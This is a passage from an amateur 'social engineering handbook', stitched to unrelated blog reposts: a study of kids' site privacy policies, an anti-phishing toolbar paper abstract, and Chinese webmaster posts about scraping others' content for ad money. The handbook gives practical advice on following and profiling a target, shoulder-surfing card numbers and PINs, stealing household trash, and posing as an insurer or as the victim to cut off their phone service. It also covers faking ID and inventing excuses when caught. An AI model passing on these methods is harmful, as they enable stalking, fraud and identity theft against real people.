By now you can tell that the littlest details about a person provides you
with a myriad of windows into their personality. Perhaps the most important
thing to be able to do with social engineering is gathering information by
watching someone. Just follow them around and make a note of everything
they do. At first what you gather will seem pretty meaningless. You should
have some info on where they go, what they like to do, who their friends
are, etc. Now sit down with your notes and start disecting the person. Are
their friends popular people, do they go to sporting events, do they commit
any crimes, do they stab friends in the back, do they plot, do they like to
talk about people? All of this information is extremely helpful when you
must socially engineer this person. For instance, if you hear them always
talking about a friend of theirs behind the friend's back, you probably
could talk this person into betraying someone. Be careful though, because
they could just as easily betray you.

SECTION 2: Shoulder Surfing

When watching people you may come into some situations in which they will
preoccupy themselves with some task and you can "shoulder surf" them to see
what they are doing, writing down, etc. You may get all sorts of
information by doing this... such as credit card numbers, social security
numbers, adresses and phone numbers, ATM pins, personal information, and so
on and so on. Now some idiots might run right out and try surfing people
for some credit card information so they can buy themselves some new
clothes and a CD player, but that is unavoidable. People who are pathetic
like that will eventually get caught and pay their dues.

Since shoulder surfing is painfully obvious, try and do it when nobody is
looking directly at you, and NEVER get too close. If someone detects you
doing this they'll probably turn around and feed you a well placed knuckle
sandwich. If people near you see what you're doing they'll probably tell
the nearest police officer and then you'll have an awful lot of explaining
to do. The best way to go about doing this is to be patient, wear VERY dark
sunglasses so you can look around without being noticed, and not to get
greedy.

SECTION 3: Dumpster Diving

Mmmm... garbage, you know I love it. The most common reason people go
dumpster diving is to find boxes when moving, to look for things to
recycle, etc. Keep those in mind, those are your new excuses when caught
digging through a trash can at 3am. If you're careful and lucky enough you
won't have have to use them. When dumpster diving there is two major rules.
One is ALWAYS bring a friend (to drive the getaway car and to watch for
certain undesirables), and ALWAYS go at night. The reasons for these rules
are obvious enough.

For the purposes of social engineering you'll be looking for several items
in a few places.

When going after a specific person you'll want to get into their home
trash. This can be pretty difficult to do with neighborhood watch programs
and all, so I would just run up, grab their trash can, and take off with it
down the street. It might be a little less conspicuous if you take a few
bags of garbage and leave the can though.

When looking for a target, for whatever sick and twisted reason you may
have, the best place to go is to telemarketing businesses. They heave tons
of phone numbers and stuff into their cans. Sometimes you'll find companies
that shred their paper, but as far as I know most don't bother to. The big
problem with getting into big company trash cans is that of Mr. Security
Officer. Before you target a place, drive around there for a few nights to
see if they employ night security.

Extra Dumpster Diving Tips:

-If a trash truck comes, GET OUT FAST.

-If someone catches you, play innocent and feed them a pre-planned excuse.
Common excuses are that of "I got lost," "I was looking for recyclables,"
"My friend thought it'd be funny to throw my shoe out the window so I made
him pull over so I could get it," and "I am moving so I was looking for
boxes." Always swear you didn't know what you were doing was illegal and go
on and on about how it'll never happen again. BE POLITE!

-Wear dark clothes, but not clothes that make you look like a hoodlum.

-Wear gloves! No one wants poo on their hands!

---------------------------------------------------------------------------
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |
---------------------------------------------------------------------------

CHAPTER 4: In Your Face Engineering

SECTION 1: Becoming Someone Else

I'm sure you can come up with countless reasons to act like someone else...
some being to call in and get their phone service shut off, to trick
friends of theirs, to get info you normally couldn't, etc. Before even
attempting anything like this, collect as many items from the following
list as you possibly can.

-Full Name (First, middle, last)

-Residential Information (Phone #, Adress, Fax #)

-Work Phone Number

-Social Security Number

-Physical Description (what your target looks like)

-Misc. Information (How many kids they have, other personal information)

Now that you have collected at least some of that information, it would be
a good idea to talk to that person somehow so you can gather information on
their speaking patterns. A good way to do that is to call their home and
act like you're from one of their insurance companies (find out which to
act like by looking through their trash and finding insurance papers), or
to pretend to take a survey. Surveyors are anger magnets though so you
might want to choose another identity.

By now you should have enough information about them to cover your ass at
least most of the time when questioned on who you really are. When someone
does this, act really surprised that such a question would be asked. Be
forceful when you speak (unless you are talking to someone the person
knows, then act as the person normally would).

Here's a tip for this section: Don't try to impersonate someone unless you
are on the phone, or you are just a really damn good engineer.
Impersonating someone "in person" is highly dangerous to your cover. Since
you are not the target, you most likely do not know who knows what he/she
looks like and who doesn't.

SECTION 2: Dressing For The Occasion

Oh boy is this section fun! This is where you get to play dress up to gain
easy infiltration of "places you shouldn't be," or to make people get the
wrong imperssion of you. First I'll talk about the impressions part.

When someone sees you, whether anyone likes it or not, they form some sort
of a judgement based on how you look. If you're one of those new
Psuedo-Gothic people, the reaction you'll probably get is either "Wow, cool
clothes man!" or the not-so-friendly "What the f*ck is wrong with you?" Now
if you were to dress up in a suit instead, people's ideas of you will be
altered drastically. Keep this in mind when walking into a large
corporation in search of "something."

Ok, here's the hard part. You must decide what to wear when going where.
Now right off the bat you might think the only thing appropriate for a
large coporate type place is a suit, but that is VERY wrong. In fact, a
suit isn't really that appropriate unless you look the right age to be
working there, and even then people would think it's kinda funny that there
is some "new guy" walking around and might ask a lot of questions. The best
thing I've found is to act like you are part of some maintenance crew. This
means you need yourself, say, a Telco hat and some "telco-guy" looking
clothes. Just waltz on in acting like you are doing a routine check on the
lines. It might help to make some fake, yet realistic, ID.

Speaking of identification: DON'T CARRY ANY. That is a very stupid thing to
do considering you are trying to act like someone else. If you do carry an
ID, put it in your sock or something.

Now you've got all the info you need on what to wear, but there is just one
last problem: your speech. I don't think anyone on the face of this planet
will not be suspicious of someone in a professional environment using the
words "dude" and "bro." Learn to speak your part. This will be harder for
some of you than others.

---------------------------------------------------------------------------
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |
---------------------------------------------------------------------------

CHAPTER 5: Randomizing Yourself

The art of social engineering is a valuable skill, valuable beyond belief.
And the basis of it all lies in our social programming. Social programming
guides the way we act, think, and feel. To successfully become an engineer,
you have to learn to identify the key features of a person's programming,
thus enabling you to predict their reactions to almost any situation.

Now the question that you should be asking yourself now is, "How do I
stop someone from 'socially engineering' me?" Calling yourself a social
engineer just to have some kid you don't like make you eat humble pie is
one of the worst feelings a person can get, so that's why I've added this
section.

No one can escape social programming. It exists within us. We have no
control over it's existance, but we do have control over the extent to
which we are influenced by it. If you are heavily affected by your
programming, then you are more likely to be susceptible to engineering.
If you are able to "ignore" your programming, then you can randomize
yourself.

The basic theory behind randomizing yourself goes something like this:

1.) When a person's social programming evolves to a point where it
completely governs their lives (as most people are), then it is easy to
engineer them, because when you learn how they think, you can stay one
step ahead of them.

2.) If I act without regard to my social programming, then I will be
effectively "unpredictable".

3.) When I am "unpredictable", it suddenly gets a whole lot more
difficult to stay a step ahead of me, therefore I am as close as I can
get to immunity from engineering.

To put this theory into practice, let's assume that you are a regular,
hard-working, teenage student. Your busy schedule only lets you have a
few hours a week to socialize, so the first week you might use your
time to call up friends and just talk to them. Talk to them about
whatever it is that you like to talk to friends about. The second week,
spend the entire week without contact to the outside world. Then, after
you get the feeling that everyone is wondering just what the hell is up
with you, spend a few days constantly out and about, keeping yourself
busy any way you can. People, especially those close to you, should
find that you are a different person every day of the week. You are now
one step closer to randomization.

So far, I have only talked about randomization with respect to
lifestyle, as this is the most obvious one to people around you, and
they tend to notice the difference much faster. But to make it a bit
more obvious, you have to change the little things about you too. Every
change you make to yourself can only help in your randomization. If you
usually dress casual, go out one day in a suit. If you are usually a big
talker, take a back seat and let someone else direct conversation.
If you have a tendency to use slang terms, then every now and then talk
in a more formal tone. This will also help you practice for when you have
to sound at least ten years older on the phone.

There are endless changes you can make to your life. Most of them will
be noticed. But always try to remember that becoming a randomized
person might help you to avoid being socially engineered, but it could
also have drastic effects on the quality of your life and the people in
it.

---------------------------------------------------------------------------
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |
---------------------------------------------------------------------------

CHAPTER 6: Social Programming

What is social programming? Well, it's the little voice inside your head.
The voice that tells us right from wrong, good from bad. It is the product
of generations of thought and teaching. It is our individuality.

It is a form of programming in which our society and it's components (be
they family, friends, enemies or strangers) condition our minds into
certain beliefs. It is even possible to program yourself. Social progamming
is responsible for most of the world's predjudice, especially among youth.

Youth, (most youth, anyway) I have found, have a tendency to be easily
misled. They might have a fight with one person of Asian descent, and
suddenly all the "damn chinks" are the enemy. They grow up believing
certain people are inferior and superior to themselves. Parents, from an
early age, teach their children things that are not always correct, but by
the time the kids realize this they are so convinced that it takes a long
time for them to come around and see the light.

A good example of this is the Vietnam War. Thousands cheered an
International army as they had been conditioned to believe that the
Vietnamese were inferior and would suffer a quick defeat (many still
believe this). When the television footage came back they were shocked to
discover that they were all wrong, but some people were never convinced.
There is still evidence of these people left today.

Social programming, in a way, can be seen as an enemy; a powerful,
non-physical force that is creating havoc everywhere. But it is also SAVING
lives every day. Our social programming, in it's primary form, is what
stops us from repeating dangerous things, because we will do something
once (say, overdose), learn that it's dangerous, and instinctively avoid
it. So in that way, it is good.

You can see that social programming is good or bad, and to tell the
truth, it doesn't matter because you can't avoid it. Even you and I are
socially programmed, but what you can do is be aware of it. By finding
someone elses key socially programmed thoughts and beliefs, you have
opened up yet another door into their life that, when used in
conjunction with the methods outlined in other areas, can provide you
with all the information you'll ever need.

---------------------------------------------------------------------------
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |
---------------------------------------------------------------------------

CHAPTER 7: Art or Science?

Whe one considers Social Engineering, it is usually reffered to as, by
myself and other well-established engineers, an art. Yet in it's true form,
it is a science. To lexically define the difference between an art and a
science, would be nearly impossible. Socially defined, the difference is
usually expressed as "A science relies on fact and definite (usually
boolean) responses, whereas an art is focused around answers open to
interpretation.

When first learning to engineer, it is easiest to refer to it as a science.
This gives it a solid base that can be filled with facts that could, if
used in the correct sequence, acheive the desired outcome. But if one looks
carefully at the sequence and patterns used by this data, some holes become
evident.

This is where the word "art" comes in. Art is a way to fill in these holes.
It involves making educated guesses and predictions to provide the missing
answers.

But suppose that there were no holes. Suppose that mankind evolved science
to a state so refined that these gaps do not exist. Would there be a need
for art? Would arts slowly be eliminated from the earth as a new range of
super-sciences ravages the planet?

Or am I just jumping to conclusions? Is this never going to happen during
our time on this planet, or could the reverse of this even be true. Could
art really replace science? There are so many possible outcomes the mind
boggles to think of them.

After writing this much in a school maths tute, I paused. For a long time.
My mind started flashing through all the possible outcomes. I cannot
choose the one that will happen. There is a "hole" in my thoughts. Does
this mean that the contemplation of the relationship between art and
science is an art?

The answer to this question is unknown. It is highly unlikely that it will
ever affect me in my own life at all. And it is also irrelevant to this
writing. What is relevant though, is the fact that you now know the
easiest way to learn Social Engineering is to start of studying it like a
science. Take notes, run tests, assume all findings to be true in given
circumstances. Then, when you have a grasp on that, you'll find that you
are asking yourself questions that cannot be answered. This is when you
are ready to progress to learning it as an artform, learn to fill in those
holes. When you get this far contact either of us writers and we'll work
together from there.

---------------------------------------------------------------------------
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |
---------------------------------------------------------------------------

CHAPTER 8: Where To Go From Here

Now that you have read through this handbook, you have a pretty good chance
at becoming a good social engineer. As you've noticed, most of this fine
art is researching things, so the best advice to give now is to continue
that practice as long as you are interested in taking advantage of the
social programming we have been stuffed full of since the beginning of man.
I urge you to come up with your own theories and methods to go about social
engineering with. If no one ever invents anything new, nothing will ever
change for the better.

Here are some last minute tips that were decided to be added:

-You can retrieve phone numbers, etc. at www.gopher.com

-Remember to gather as much information as possible before taking on a big
engineering project.

-Once you've been around with this information in mind for a long time, you
will start having the ability to lie and socially engineer situations on
the fly; that is one of the main goals of most engineers.

-Always use your knowledge for good, because the old saying, "What goes
around, comes around," comes true more than you would imagine.

-Learn to do things like faking sick, hiding emotion, showing fake emotion,
etc.

---------------------------------------------------------------------------
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |
---------------------------------------------------------------------------

GLOSSARY OF TERMS:

Dumpster Diving: (v) Searching through people's rubbish bins for clues
about them, for example, Phone Bills, Customer Lists, and Receipts.

Neuro Lingustics: (n) Using language that appeals to a specific person to
open them up to you, and allow one to gain information that would normally
be considered too private.

Physiognamy: (n) The art of using a person's physical appearance to make
educated inferences about their lifestyle.

Randomizing: (v) To put something out of order, or to be in no distinct
pattern.

Shoulder Surfing: (v) Following a person closely so as to gain information
about them by looking at what they're doing.

Social Engineering: (n) The name given to any acts of engineering that
involve the interaction of people in any given environment.

Telco: (n) A name given to represent the global community of telephone
companies.

Social Engineer: (n) Any person who uses learnt knowledge to engineer
social situations, or to manipulate any general or specific part of the
world's social masses.

---------------------------------------------------------------------------
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |
---------------------------------------------------------------------------

CONTACT/MISC INFORMATION:

To contact the writers of this handbook, please use the following
information:

Email: Sirkuit - Sirkuit_w@yahoo.com
Phrantic Anima - Phrantic_anima@hotmail.com

Website: http://n0p.crashcentral.com (Distribution Site)

We wish to thank the following people and organizations:

n0where Productions, C2032, HAO, Telcos everywhere for the use of their
equiptment (bwahahah), Plato, Troy R, Robin T, Shannon K, Alex B,
Austrailian and American phreaks, and anyone who has ever tried to push the
limits of the human mind.

Sirkuit wishes to dedicate his part in the production of this file to his
girlfriend Amanda.

Please don't bug us about spelling or grammar errors. You'd be surprised
how many people think it is that important.

Examining the readability of privacy policies for the most popular kids Web sites

2006-11-22T03:20:00.001-08:00

As parents prepare for summer vacation, with their kids spending more free time on the Web, our thoughts turned to online privacy policies. Are kids well equipped to understand the policies of the sites they visit? We examine the top hundred most heavily-trafficked kids and teens English-language Web sites (as ranked by Alexa), analyzing their privacy policies for readability.

SiteAdvisor doesn’t review legal notices as part of its automated testing, but we are concerned these documents use language that’s too complex for children to understand (not to mention adults, in many cases). Anecdotally, we know that even young children often surf the Web alone. In fact, a Kaiser Foundation study found that 31% of minors aged 8-18 have a computer in the bedroom.

This is important for several reasons. Children don’t always ask their parents’ permission before registering for sites or installing programs. Indeed, we think it’s safe to assume that most kids don’t even read accompanying legal notices before "accepting" them. And for the few kids who do read them, we suspect they don't fully understand the contents.

License agreements and privacy policies often bury fine print users wouldn’t like and don’t intend to agree to. Some policies contain language purporting to allow a site to sell or rent a user’s e-mail address to third party advertisers. Others purport to let the site install unrelated adware along with the games or music the child seeks.

Reading At Grade Level
Readability.info is a Web site built by Dave Taylor, a computer scientist, technology consultant and entrepreneur. The site rates the readability of English language text uploaded to it using seven standard academic comprehension scales. The scales are different, but some common criteria include the number of syllables per word, the number of characters per word, and the average number of words per sentence.

We decided to focus on the Lix readability scale because its scores correspond to U.S. school grade reading levels. In other words, the scores reflect the grade level required to comprehend a text -- in our case, a Web site’s privacy policy. (Learn more about readability tests at this Wikipedia entry).

Has The Jury Reached A Verdict?
The sites with the most and least readable privacy policies are as follows. (The numbers refer to the Lix Score and the corresponding grade level:

Top 10 Most Readable

1. bbc.co.uk/cbbc – 38.6 - 6
2. yahooligans.yahoo.com – 39.4 - 6
3. geocities.yahoo.com – 40.1 - 6
4. pbskids.org – 40.8 - 6
5. onelook.com – 41.9 - 7
6. mugglenet.com – 44.2 - 8
7. tripod.lycos.co.uk – 44.6 - 8
8. starwars.com – 46.6 - 8
9. gamespot.com – 47.6 - 8
9. gamefaqs.com – 47.6 - 8
9. enchantedlearning.com – 47.6 – 8
10. fifaworldcup.yahoo.com – 47.9 - 8

Bottom 10 Least Readable

1. guildwars.com – 64.5 – 11+
2. nickjr.com – 60.9 – 11+
3. fifa.com – 60.4 – 11+
4. noggin.com – 60.1 – 11+
5. xbox.com – 59.4 – 11+
5. encarta.msn.com – 59.4 – 11+
5. microsoft.com/games – 59.4 – 11+
6. blizzard.com – 59.3 – 11+
6. battle.net – 59.3 – 11+
7. thinkquest.org – 58.7 – 11+
8. ubi.com – 57.7 – 11+
8. us.playstation.com – 57.7 – 11+
8. mtv.com/music – 57.7 – 11+
9. homestarrunner.com – 56.8 – 11
10. nick.com – 56.6 – 11

To put these results in context, consider the grade levels required to understand some well known texts:

A typical New York Times story – (Grade 5 -- 34.1)
A typical White House press release – (Below Grade 5 – 28.3)

View the scores of all privacy policies here. All policies were tested on June 11, 2006.

(A note on our methods: We began with Alexa’s top "Kids and Teens" sites which is based on the DMOZ open directory project. We took the top 100 English language sites, removed duplicate second-level domains as well as sites that seemed, to us, to be targeted at adults (e.g. honda.com, faa.gov). We were left with 50 sites, which we then tested and ranked.

The Simple
The ten sites with the lowest Lix scores all have legal notices that anyone who reads at a sixth grade level can understand.

Case in point: Yahooligans.com. This Yahoo-operated site for kids has a straightforward privacy policy that uses easy-to-understand prose. Notice Yahoo’s simple declarative sentences.

"...this Children's Privacy Policy provides further information and privacy protections for our users who are under the age of 13."
Its "Information Sharing and Disclosure" section succinctly states:

"Yahoo! will not contact children under 13 about special offers or for marketing purposes without parental consent."
Yahooligans provides an educational article for parents about how to interpret privacy policies. A noteworthy quote:

"Make sure your children know to ask for your permission before they give out ANY personal information about themselves to any web site or in response to any email message."
Pbskids.org also features a privacy policy written at a sixth-grade reading level. Like most privacy policies, it informs the reader that visiting pbskids.org will result in the creation of "cookies" in the Web browser. It commendably proceeds to define what a "cookie" is, for those who don’t already know.

"What's a cookie? A cookie is information a Web site puts on your computer's hard drive so that the site can remember your preferences or which pages you visited on that site."
The Complex
The ten sites with the highest Lix scores all have intricate legal notices that require a reading comprehension level at or above grade eleven. We focus on two sites owned by Viacom.

The privacy policy for the Web site of cable channel Nick Jr. is nearly 3500 words long and packs a few potentially troubling tidbits. For one:

"From time to time, we (independent third-party shop.nickjr.com) may transfer, disclose or share such information with third parties who may be engaged by us specifically to handle and manage certain functions (e.g., fulfilling contests and sweepstakes conducted on the Shop to which we are sponsors)."
Nickjr.com is devoted to the kindergarten set with games and activities built around TV shows like Blues Clues and Dora the Explorer. Not the kind of audience that’s up to comprehending "transfer, disclose or share...with third parties."

Fellow Nickelodeon channel Noggin proudly describes itself to be "like preschool on TV." However, you’ll need to read above an eleventh grade level to understand their Web site’s privacy policy. Try asking a child to wrap his head around this sentence:

"Noggin.com currently does not disclose to third parties personally identifiable information that users provide except, from time to time however, we may transfer, disclose or share such information with third parties who may be engaged by us specifically to handle and deliver certain online activities (e.g. conducting contests and sweepstakes)."
Under a section called "For Parents," Noggin does encourage parents to talk to their kids about personal information and the Web:

"We urge preschoolers to check with their parent or guardian before entering any information on any website and we urge parents and guardians to discuss with their preschoolers restrictions regarding the online release of personal information to anyone they don't know."
As for the kids who surf Noggin.com alone, we suspect that nothing will stop them as they search for a good Connie the Cow game or Pinky Dinky Doo sing along.

Good Advice?
Microsoft advises parents to read it "all."

"The key to helping prevent the installation of spyware is to download programs only from sources you trust and to read all security warnings, license or user agreements, and privacy statements associated with any software you download or install on your computer."
The National Cyber Security Alliance goes further with this recommendation:

"If you don't see a privacy policy – or if you can't understand it – consider doing business elsewhere."
Generally speaking, we agree that users should know what they’re getting into when they click "I agree." But we’re not the first to look at how hard it is to take this advice given the complexity of legal notices. Wayne Porter from Facetime examines the Tinkopal toolbar end user license agreement (EULA) using the Flesch-Kincaid Readability Test. Spyware researcher (and SiteAdvisor advisor) Ben Edelman dissected an old Gator EULA.

In fact, Ben has often focused on kids Web safety. His dollidol.com investigation revealed an instance of a Zango adware installation process that (among other things) presented a "license agreement in an oddly-shaped window that discouraged careful review." We recently published "Are Smileys Safe?" which exposes the use of "free smiley" offers as a way to entice kids to install adware.

Keep It Simple
SiteAdvisor doesn’t rate a site unfavorably if its legal notices are too complex for its target audience. In fact, all of the sites in Alexa’s Top 100 English-Language Kids and Teens Web sites are rated green (safe-to-use) by SiteAdvisor.

Nonetheless, we do think these sites ought to revisit their privacy policies. Perhaps this article will inspire the Web’s most popular Kids and Teens sites to consider children’s reading abilities when writing their legal notices. We recognize that Internet law is complex and legalese is often necessary. SiteAdvisor’s own 2,409 word Terms Of Service has a Lix score above the 11th grade level, though our service is not targeted toward children. Our "Really Big Picture" Terms Of Service overview has a Lix score at the 9th grade level. We point to sites like Yahooligans and PBSKids that have managed to draft their notices to be more readily understandable to their intended users. We support that effort.

Not all parents and guardians can supervise their childrens’ every click. One way to help kids stay safe from spam, spyware and scams on the Web is to install our software and tell the kids "green means go" and "red means run." And that advice has a very good readability score.

Phinding Phish：An Evaluation of Anti-Phishing Toolbars

2006-11-22T03:19:00.001-08:00

文章作者：Lorrie Cranor, Serge Egelman, Jason Hong, and Yue Zhang
相关链接：http://ddanchev.blogspot.com/2006/03/anti-phishing-toolbars-can-you-trust.html

There are currently dozens of freely available tools to help combat phishing and other web-based scams. Many of these tools come in the form of web browser extensions that warn users when they are browsing a suspected phishing site. We used verified phishing URLs and legitimate URLs to test the effectiveness of 10 popular antiphishing toolbars. Overall, we found that the anti-phishing toolbars that were examined in this study left a lot to be desired. SpoofGuard did a very good job at identifying fraudulent sites, but it also incorrectly identified a large fraction of legitimate sites as fraudulent. EarthLink, Google, Netcraft, Cloudmark, and Internet Explorer 7 identified most fraudulent sites correctly and had few, if any, false positives, but they still missed more than 15% of fraudulent sites. The TrustWatch, eBay, and Netscape 8 toolbars could correctly identify less than half the fraudulent sites, and McAfee SiteAdvisor did not correctly identify any fraudulent sites. Many of the toolbars we tested were vulnerable to some simple exploits as well. In this paper we describe the anti-phishing toolbar test bed we developed, summarize our findings, and offer observations about the usability and overall effectiveness of these toolbars. Finally, we suggest ways to improve anti-phishing toolbars.

3个月流量3万ip的故事。落伍一圈发现又回到原点，但却是新的开始！

2006-11-22T02:37:00.000-08:00

来了落伍，学到了很多！也失去了一些，但总体是收获比失去的多得多。在落伍我学到了什么叫“网挣”，什么是中国的“网挣”，经过一个月的辛苦测试，终于证明了一个结论：什么站都能挣钱！

首先说明我是如何建站的，我当初的梦想是以”书“的形式来统一信息，因为我始终相信”书“是唯一能归类整理信息的”工具“，所以我做了书站。整个网站模拟自然书的结构。开始的流量只有一天30人。

为什么没有流量呢？原因很简单，因为我的书全是”经典“的书，而不是玄幻类的文化快餐。从此我改变了思路，还是先有流量再说，于是进了百度排行榜，选最热门的书添加（纯手工的方式）。可是让我失望的是，所有的小说站都是广告，而且禁止粘贴复制！加了一晚上才加了一本书。(幸运的是那段时间我一直在研究网络蜘蛛，因为我想要实现信息的归类整理，只有靠机器去完成，人是不可能的。)第2天继续加书的时候我用自己研究的小工具抓取了下那个“垃圾”书站的内容。发现竟然是静态页面再套个iframe,而js 代码禁止粘贴复制。但iframe里面竟然是一个aspx文件，而且带有参数。当时喜出往外，于是连续获取那网站3个页面，书页，卷页，及章页。我惊奇的发现，原来我可以轻易的写程序采集出来。于是一天写了采集程序，终于可以点下按钮加一本书的。可是问题出现了，成功率只有98%,也就是一本书，至少有一张缺页。我继续采第2遍，发现依然缺页，但缺的不是同一张。终于知道了，因为网速，怎么也会有误差，于是我设计数据库，把采集过的地址保存下来，并且判断是否抓取成功，没成功就补抓，补抓3遍终于出错率降低到了万分之一。继续完善程序，花了3天针对那个”垃圾“站点写了采集程序，一晚上采集了近1万本书。并且全部做了搜索引擎优化。

开始，奇迹发生了。流量从 30－200－500－1200－3000－6000－12000－3万 ,我现在依然能记得当时是怎么成几何级数增长的流量的。平均每过一星期就要增长2－3倍！

盈利：为了挣钱我来到了"落伍”，虽然我承认是编程高手，但对于网挣我是个外行。很快因为网站，我落伍了。很快认识了很多“落伍”的朋友，很快我去尝试了很多联盟。什么sogou,keyrun,iplus,myad,百度推广，gogle推广，还有采信，电影等等。从点击广告，到美女图片，到弹出窗口，我都放。很快自己真的“落伍”了，很快开始的理想忘了，很快我的站也垃圾了，虽然一天可以挣个100多。

流量的急剧下滑：也许上天的惩罚，也许是因为我太过于急功近利。终于，我遭了“落伍”的黑手。我的站给别人采集了。由于我全部页面div+css,采集我的站的人基本随便找个软件就可以100％采集完。而那个人又是个seo高手。于是我对流量全跑他那去了。我写信给那个人，他也回了，他告诉我以前不知道采集为何物，也是因为在落伍亮了自己的站，所以给采得体无完服。从那以后，他再也不在落伍发帖，只看帖。从那以后，他也采集了，从那以后。。。。。。。我成了他的目标.......

反采集研究：从那天起，我猛然意识到，光采集还不行，采集所有基本的手段和技术对我来说都不存在技术门槛，但我不能让我辛苦采集到的内容给别人轻易采集了。于是，我苦心研究了几天的反采集技术，因为我相信一般采集的人自己都不会写采集程序，都是下程序来采集的，而且大多数是web采集程序，所以只要能防得住我自己，相信可以防得住99％的菜鸟采集者。当然高手是不可能防得住的，除非你不显示。终于我研究出了初步的反采集，即能让搜索引擎搜索，又能让采集程序无法获取内容，结合js，又能让浏览器获取内容。实验了一个星期，百度成功更新了我改版后的网站！

奇迹，流量少了，挣的钱反而多了！有的时候真是有意载花花不开，无心插柳柳成阴。我无意中采集csdn6万篇编程文档，竟然让我每天挣了10美元！编程站每天只有2000的ip,pv也不过3000，然而经过我优化google广告的位置，竟然破天荒的达到 3－4％的点击率，而且单价非常之高！！！以前3万ip,15万pv的读书站，少的时候只能挣8美元，而2000ip的编程站竟然能获取这么多收入！

回到原点，人间正道是沧桑！结合自己做百度的经验，在百度里做竞价的都是企业，比如卖车的广告，没有人出汽车这个关键词，因为搜汽车的都是看图片的，但输入汽车品牌，汽车配件，肯定是商人或用户，所有有人出高价！同样的道理，网络的经济，尤其是google 的广告，我们的企业何尝不是最大的广告主呢？为了避免无效广告，为了体验“效果为王”各个商家都会在很专业的领域买关键词。所以才有编程站的单价之高！所以真正的网挣，是获取真正有价值的信息，到了今天我才明白了什么是IT,什么是“信息科技”！

未来发展的方向：“采尽天下为我所用“！2005年是搜索力经济年，在2006年这个势头还会持续发展。搜索引擎之所以能火，是因为它海量的信息！既然自己能轻易的把那么复杂书采集了，证明一点没有我采不到信息，但关键不是采集，而是建立起智能蜘蛛，让服务器自动的去采集，整理，发布。把采集程序写成windows的服务。开机自动运行，并且定时读采集规则文件，定时采集，定时发布成最最最简洁的静态页面，方便搜索引擎收入。而信息就是全天下的各行各业的正规信息。在采集的同时，不断完善反采集技术，做到只有我采别人的，不能让别人来采我的。因为最后我发布的信息肯定是很简洁的信息。

我的心里话：钱＝有价值的流量＝有价值的信息。联盟就做google吧，因为google是迄今我认为最公正的最不会扣量的网挣联盟。做国内的10个联盟都比上做一个google，而且你做那种广告，用户体验会降低，而你放google不但不会妨碍别人访问，反而会因为google的知名，让人感觉你的网站正规可信！

广告也疯狂！

2006-11-21T21:21:00.003-08:00

相信来落伍的朋友90%都是站长，剩下的10%也正蠢蠢欲动的想成为站长，下面我就介绍一下我对站内广告的看法。

广告，相信很多站长朋友都是用它来赚钱，用它赚来的钱进一步发展，但是要如何做广告才能收入更客观呢？这就是我们要说的问题——广告也要”对号入座“。

3月份，我办了一个电影小偷站，用的程序还行，在线看电影的速度很快，在一些大网站宣传，很快，日IP到了1000，但是只有IP没有RMB也不行啊。我就想到了广告，在网上一看，广告联盟还真不少，有短信的，有电影联盟的，有点击付费的，真是挑花了眼。刚开始，放了一家知名的短信联盟广告，一个月过去了，只有一个注册的，还只注册成功了一半，收了一半的钱，7.5元，交了税还剩6.9，我晕~~~~这样怎么能行？想想，换吧，换成点击的，注册不注册，只要你点，我就有钱，点击广告放上了10来天，一看，每天才20个点击左右，也就每天将近1元，人家是100元结帐，那我不是要放100多天才能收100元？幸亏我不是专业搞站的（不是靠站吃饭），要不，非饿死不可。点击就先放那吧，最后想到了电影联盟，随便申请了个代码，挂在了站上，第2天一看，两个注册的，收入14，还不错，就把代码换在了显眼的位置，加大推广力度，不到一个星期，就收到了电影联盟的56元，从那以后，平均每天至少有一个注册电影联盟的，一个7元的话，一个月也就是200多，付空间费用是够了，能用站养站了。所以，我觉得，选择投放广告也是要看你站点的类型的，比如：音乐站适合铃声下载、电影站适合电影联盟等等。

不怕大家笑话，那时我的电影站IP一天还不到1000，但是那个电影联盟广告至少每天收入7元，有一天上行高，注册了3个，收了25，这就是我做广告的一点心得，希望大家能用的上。

当然，有些站长朋友不喜欢电影联盟或短信联盟，认为那是在骗自己站上网友的钱，不愿放那样的广告，当然各有各的想法，大家不要笑我啊

以上是6月份之前做的电影站，后来，因为打击诱导注册厉害了，我就把站卖了，卖了600，连广告费和卖站的钱一共有1200左右，做了3个月，除了空间和域名费用，赚了1000块。

卖了电影站，我不甘寂寞，又搞起了小说站，小说站可不象电影站，挂电影联盟代码，根本没用，10天也不一定有一个注册的，再换，换成MOP和QIHOO的点击广告，MOP1000点击/30元，我放在重要位置，2500IP，一天点击在200左右，MOP一天进帐6块左右，QIHOO1000点击/10元，但是他的点击高，一天也是200左右，QIHOO一天进帐2块左右，前几天又注册了阿里联盟，1000点击/40元，一天进帐3块左右，点击都不算多，但是算下来的收入付空间费用是足够了，我的野心不大，网站收入能付空间费用就够了，毕竟我不是靠做站吃饭，如果网站真能发展起来，够我养家糊口，那我就辞职不干了，专门做站，

3年来的一些想法!

2006-11-21T21:21:00.001-08:00

自2004年3月购置第一台服务器至今,快3年了，浅意识里觉得自己就是个个人站长.不管这其中做过一些什么工作，很大程度都是为了把个人网站做好打基础.几乎天天都在想,如何用互连网赚到钱.

互连网在悄悄改变我们的生活,看新闻上新浪.订酒店可以找协程.买东西有淘宝.聊天用QQ.百度代替了10W个为什么,再也不用为了某个问题,去买大堆大堆的书.再看看父辈的生活,他们年青的时候找对象,表达爱意那得靠邮递员.现在的人,传递信息还靠邮递员么?我们可以选择的方式太多了.信息时代便捷,快速.

我们通过互连网可以做的事情太多了,可毕竟这个事物发展才10几年,需要完善的事情太多太多.把互连网不成熟的地方找到,并去实现.我想这就是所谓的创新精神吧.多少企业在讲创新，创新才有发展,这是个真理.网站在信息时代的大背景下,最重要的就是提供信息.

